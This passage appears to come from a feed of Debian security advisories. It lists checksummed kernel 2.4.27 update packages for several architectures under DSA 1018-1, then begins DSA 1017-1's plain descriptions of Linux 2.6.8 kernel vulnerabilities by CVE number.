http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2198 53f3a8546c48f4872424f905cf7885b0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2248 130656ebcf35178df320c2f80ff446b3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298294 040778c609195abb76faf5dc6b2c4484\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2180 ed27ff9b477d3f06a89636ff63c1a608\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 286360 256a7cfba28e8f80e5ed1b36d463bbaa\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2198 73159b5fcca4e503e4e39d26d01f611b\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2152 bf549dc4754ad6432ec6a9133c288b55\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2182 32ef20edb04d84ae67b59ef74ca73c41\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2250 8fe3e928f92a4148cf5aef691717defd\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2226 11a3d9e97540823f189274cbf0964f40\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2268 eb19757eb174ca892c60b9ca003f6993\n http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 93990 ddf78ba3ee58f63c3ebb6ab2b686cbc9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 11709566 cc9d039b9cec5d5532023bffd1e13203\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7-smp_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77734 5e4b8007c196b17ee41776406b0b8230\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2178 a47be61afd7e8d4b63eaa0d5facec45c\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2176 cd6cfe3b2f4d398d759906817afafdf9\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-586tsc_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77604 c427abcb6f60c5bf1ac10bc19a65a8b8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12680486 1cb5b20b959b842df55c59a72278c084\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258980 ed75fb59949e2364abfc9459a4832fb3\n http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 56466 54f5cb20cca23c63adb22dacd6710641\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k6_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477594 429eb2dd9bec9b005332f8025849f378\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 303960 7163cde6ff6fb60f77c3be86b98c9ed9\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-headers-2.4.27-speakup_2.4.27-1.1sarge1_i386.deb\n Size/MD5 checksum: 4770342 c029fb318f3e99e16df3cc4431f48b06\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 300096 d72f151d92cd2b9e3b32247987bc9d77\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259296 a1674fac85b1dc7aaf4e43099bf6de5c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k6_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297542 e374488c0c43422a644ee1d8d5687f89\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 474438 5bad3d0b235b6dd4e13d1cd124dc0b8f\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2200 3641ec5e13ebe5cbf5713d7b6a9af77a\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77592 9655842dd75143b38d9591c05c069ac7\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686-smp_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77674 f068190e67295066533fb3fff111c814\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-build-2.4.27-3_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 8342 a1fe9c769945a7635ecc03b1e187e7fc\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7-smp_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259850 b623d22abc6f054d77b7a30917f08009\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77678 0a7beec37cd1bf7ec8f1731ae9d6bb9a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12086466 5af66657e22fdb6314119ea36a6c1c75\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2188 d2c285ee0c9bc108e0d4cd2e678bc6e0\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7-smp_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 484198 53b2e26c3a6892fe41301e31a8e91701\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298018 9d13a45679af6957abfc23b8878073c4\n http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 77968 bd243ceab2becfd668549358465abe69\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16976446 51987cad8f3f6eb3281ce356f736f90d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 17021738 57ead1bebe1a5f0eccc071e6a5f30f54\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4986 e10834d87d38a13a5c2ee5f13eed4d02\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 240590 4f512fc8f28e2a11cdd97569319d90f5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 240498 d4a0592c1014cd8d2d3b87ae052ff995\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4956 bd7812c913d7ea5ce87e8a249b8935af\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-3_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 5226 d74eb98006da5dab26589509ded5f29e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 239378 83101f13dbb75a77ff1a2685c1b59bfd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4992 7ba2aacc74bc4ac4370d2b6bf221e35a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4687006 1230148f08b0c17763e79b94986bc9bd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium-smp_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 4972 bfd5bcd58354b443c53a13bb6708be37\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16621676 1bd285f8adedf710b1461724b0af8a61\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 239426 87381161e1e8d269ab82e51518cf79c4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium_2.4.27-10sarge2_ia64.deb\n Size/MD5 checksum: 16667452 ca44e47123ea32e0efe93bca7794de8c\n\n Motorola 680x0 architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme147_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2320966 4a15213792fd9ef48330cd67f767ab9d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-amiga_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2636422 ce2e589e3f58a53dcbbe362aa06bbdc0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme16x_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2394430 d0d19d564536a6640fe1401b91830a05\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-bvme6000_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2393560 c8afb24f7148596650c8140bdad7aa0a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-q40_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2260368 28858d5d8037969dddeed9eb787edae5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-atari_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2543228 6b5c2fdb57f7618bd884a56775fddea0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mac_2.4.27-3sarge2_m68k.deb\n Size/MD5 checksum: 2475286 a6f7278b437e2c9f1efaf8230a7cf038\n\n Big endian MIPS architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-ip22_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 3848722 3cab75f38b72bff67ea0dae8239d2d8b\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-ip22_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 3847778 f250503d744408577b15430e62b73f28\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 7173140 99adeeb4f9a7ee12dbdd658311d4f641\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 4680422 75df59733690bc09bd5c854ab7cabfbd\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge2.040815-1_mips.deb\n Size/MD5 checksum: 18136 4ec345ef0b666b186646c2c209a9fda8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-lasat_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 2136150 2f180ceeeff353b1ac0e7a2a2869badc\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-cobalt_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4101818 b185a2cb8c1345d07c4f58f079c8abc8\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-xxs1500_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4668528 ce59d155e7f5de0b9512c8ae07e7d19f\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-kn04_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 2990238 2305898af4fbe07fb3b86a3658926b2a\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 18174 c5f6f20831a72ba867d251700636c30d\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r3k-kn02_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 3031148 0b84aa08bbd98a75b3c6e615dc78acd5\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 7037466 690116f5951c221bfbbe94838a1afe0d\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge2.040815-1_mipsel.deb\n Size/MD5 checksum: 4685148 27568e054ecb5cfe22665cf3e4220d25\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 8722 fcfa53d79c741eb526efd83af6b77501\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4800060 9c3bc9afe4bde5642d352199bd6910bc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 1815364 531c6100c8a5ae8cd54a92c47935cacc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-small_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 12749452 d1460d74881e9dee0abe8f1e66edc940\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 8796 b29ec0ebb05f2980425452ff60efc78d\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 65486 0aa2289da231fdcca1311650e9a7ecd4\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 2496580 506d7979b6b2ec7fe1485f7bff41a7be\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-small_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153562 7d17ab040429b0802cbeb4a45ff4ed6a\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 13478332 65955c570b7d715dae51503d24248214\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 139374 14c07ada6bc05f9fdf9330d295ced263\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153260 16794e5cc21f355da1df4153744d2cdc\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4692188 97f4f54124d47127aaad6b30b68fda7b\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-image-2.4.27-powerpc-smp_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 13785186 9892ac04d3c9390c6a711a32af828152\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-apus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 4682152 1f4e90348fe6a188a2360f57493c0516\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-smp_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 153314 ae274ab60fad595683c4decfecdd12de\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-nubus_2.4.27-10sarge2_powerpc.deb\n Size/MD5 checksum: 139174 7664ec4c4b8e49aad2271d8f9b91fa59\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390x_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1894 7c7d6ffff4091efa73369deb17b8c3a7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 2775998 6574681ce171f9a74f7565ea3f3ce3f1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-image-2.4-s390_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1882 b2315be9f4c33a570f0da301890dd95d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390x_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 2967840 2ad64001085223fdd5f330bbbeb74e81\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-headers-2.4.27-3_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 4577766 84aa474690a106c530558c478aff3a93\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-headers-2.4-s390_2.4.27-1sarge1_s390.deb\n Size/MD5 checksum: 1900 1db72f0edc5d91d2e33521c672348378\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-3-s390-tape_2.4.27-2sarge2_s390.deb\n Size/MD5 checksum: 992372 6c160c930e44a2e995d6db92ded45ce4\n\n Sun Sparc architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32_42sarge1_sparc.deb\n Size/MD5 checksum: 2154 663611e24366e37a6a2569bad319a8d9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 3785134 7ed118f20b7aa0065d8dc51c5f7015fc\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64-smp_42sarge1_sparc.deb\n Size/MD5 checksum: 2164 3b4cf82e794f30a3c4e73e9ac7346417\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc32_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 3598262 8077cc063a9638f64caa0b7501be6698\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 202410 925e828aac054961b71f4cb853a1a81d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 162680 8daeded3c5c21dadbc16fcb57e17ba0c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc64_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 201200 b8d59c4959f3641efe0825be35475b60\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-build-2.4.27-3_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 8358 6721b433e723689deff7a75c1a152436\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc32-smp_42sarge1_sparc.deb\n Size/MD5 checksum: 2166 4e12596102cf4e9745092ef9cb508717\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32-smp_42sarge1_sparc.deb\n Size/MD5 checksum: 2180 f902f292c36330b4bd131a090a4021c7\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 6377516 987de05fb71c80488eac9f9fa0be3dab\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-3-sparc64-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 6544548 60fe57c18de3491548b4d2bf1bf2ca9e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-image-2.4-sparc64_42sarge1_sparc.deb\n Size/MD5 checksum: 2148 aab546c40ad9023566c2b4b27a76af2f\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64_42sarge1_sparc.deb\n Size/MD5 checksum: 2172 79806225a92e82ce0e05031044400ed3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3-sparc32-smp_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 164444 a4bbab66bcb9f637efb72ec48f4756c2\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc32_42sarge1_sparc.deb\n Size/MD5 checksum: 2176 72e294e5434527f1571f0331e5d11ab9\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-headers-2.4-sparc64-smp_42sarge1_sparc.deb\n Size/MD5 checksum: 2178 8f65c643973e1bc2b2cbd1a68a3ab2a6\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-headers-2.4.27-3_2.4.27-9sarge2_sparc.deb\n Size/MD5 checksum: 2023602 04be2535bd4ea027a3167ae6aec300c2\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2006-03-24T00:00:00", "published": "2006-03-24T00:00:00", "id": "DEBIAN:DSA-1018-1:7F47B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00100.html", "title": "[SECURITY] [DSA 1018-1] New Linux kernel 2.4.27 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:15:48", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3358", "CVE-2006-0096", "CVE-2005-3181", "CVE-2005-3858", "CVE-2005-0124", "CVE-2005-2490", "CVE-2006-1066", "CVE-2005-3356", "CVE-2005-3053", "CVE-2005-4618", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-2800", "CVE-2004-1017", "CVE-2005-4605", "CVE-2005-2709", "CVE-2006-0095", "CVE-2006-0482", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3847", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-3055", "CVE-2005-2555"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1017-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier, Simon Horman\nMarch 23th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.6.8\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE ID : CVE-2004-1017 CVE-2005-0124 CVE-2005-0449 CVE-2005-2457 CVE-2005-2490 CVE-2005-2555 CVE-2005-2709 CVE-2005-2800 CVE-2005-2973 CVE-2005-3044 CVE-2005-3053 CVE-2005-3055 CVE-2005-3180 CVE-2005-3181 CVE-2005-3257 CVE-2005-3356 CVE-2005-3358 CVE-2005-3783 CVE-2005-3784 CVE-2005-3806 CVE-2005-3847 CVE-2005-3848 CVE-2005-3857 CVE-2005-3858 CVE-2005-4605 CVE-2005-4618 CVE-2006-0095 CVE-2006-0096 CVE-2006-0482 CVE-2006-1066\nDebian Bug : 295949 334113 330287 332587 332596 330343 330353 327416\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2004-1017\n\n Multiple overflows exist in the io_edgeport driver which might be usable\n as a denial of service attack vector.\n\nCVE-2005-0124\n\n Bryan Fulton reported a bounds checking bug in the coda_pioctl function\n which may allow local users to execute arbitrary code or trigger a denial\n of service attack.\n\nCVE-2005-0449\n \n An error in the skb_checksum_help() function from the netfilter framework\n has been discovered that allows the bypass of packet filter rules or\n a denial of service attack.\n\nCVE-2005-2457\n\n Tim Yamin discovered that insufficient input validation in the zisofs driver\n for compressed ISO file systems allows a denial of service attack through\n maliciously crafted ISO images.\n\nCVE-2005-2490\n\n A buffer overflow in the sendmsg() function allows local users to execute\n arbitrary code.\n\nCVE-2005-2555\n\n Herbert Xu discovered that the setsockopt() function was not restricted to\n users/processes with the CAP_NET_ADMIN capability. This allows attackers to\n manipulate IPSEC policies or initiate a denial of service attack. \n\nCVE-2005-2709\n\n Al Viro discovered a race condition in the /proc handling of network devices.\n A (local) attacker could exploit the stale reference after interface shutdown\n to cause a denial of service or possibly execute code in kernel mode.\n\nCVE-2005-2800\n\n Jan Blunck discovered that repeated failed reads of /proc/scsi/sg/devices\n leak memory, which allows a denial of service attack.\n\nCVE-2005-2973\n \n Tetsuo Handa discovered that the udp_v6_get_port() function from the IPv6 code\n can be forced into an endless loop, which allows a denial of service attack.\n\nCVE-2005-3044\n\n Vasiliy Averin discovered that the reference counters from sockfd_put() and \n fput() can be forced into overlapping, which allows a denial of service attack\n through a null pointer dereference.\n\nCVE-2005-3053\n\n Eric Dumazet discovered that the set_mempolicy() system call accepts a negative\n value for it's first argument, which triggers a BUG() assert. This allows a\n denial of service attack.\n\nCVE-2005-3055\n\n Harald Welte discovered that if a process issues a USB Request Block (URB)\n to a device and terminates before the URB completes, a stale pointer\n would be dereferenced. This could be used to trigger a denial of service\n attack.\n\nCVE-2005-3180\n\n Pavel Roskin discovered that the driver for Orinoco wireless cards clears\n it's buffers insufficiently. This could leak sensitive information into\n user space.\n\nCVE-2005-3181\n\n Robert Derr discovered that the audit subsystem uses an incorrect function to\n free memory, which allows a denial of service attack.\n\nCVE-2005-3257\n\n Rudolf Polzer discovered that the kernel improperly restricts access to the\n KDSKBSENT ioctl, which can possibly lead to privilege escalation.\n\nCVE-2005-3356\n\n Doug Chapman discovered that the mq_open syscall can be tricked into\n decrementing an internal counter twice, which allows a denial of service attack\n through a kernel panic.\n\nCVE-2005-3358\n\n 